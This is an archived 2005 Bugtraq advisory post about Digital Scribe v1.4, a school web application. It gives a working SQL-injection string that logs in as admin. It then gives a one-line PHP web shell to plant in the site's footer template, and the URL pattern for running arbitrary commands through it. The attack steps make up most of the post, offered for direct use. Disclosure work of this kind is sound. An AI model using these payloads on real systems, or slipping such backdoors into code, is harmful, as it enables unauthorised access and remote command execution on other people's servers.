| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 15 Sep 2005 12:51:23 -0000 From: retrogod@...ceposta.it To: bugtraq@...urityfocus.com Subject: Digital Scribe v1.4 Login Bypass / SQL injection / remote code execution Digital Scribe v1.4 Login Bypass / SQL injection / remote code execution software: site: http://www.digital-scribe.org/ description: "Teachers have full control through a web-based interface. Designed for easy installation and even easier use, the Digital Scribe has been used in thousands of schools. No teacher or IT Personnel needs to know any computer languages in order to install and use this intuitive system. 1) Login Bypass / SQL Injection ************************************************ login as admin typing: login: " or isnull(1/0) /* password: [whatever] 2) remote code execution ******************************************************* now you can edit template and leave a backdoor on target system: at the end of the footer try this: <?php error_reporting(0); system($HTTP_GET_VARS[cmd]); ?> then you can launch commands: http://[target]/[path_to_dscribe]/index.php?cmd=[some_command] rgod site: http://rgod.altervista.org email: retrogod at aliceposta it original advisory: http://rgod.altervista.org/dscribe14.html ********************************************************************************
Powered by blists - more mailing lists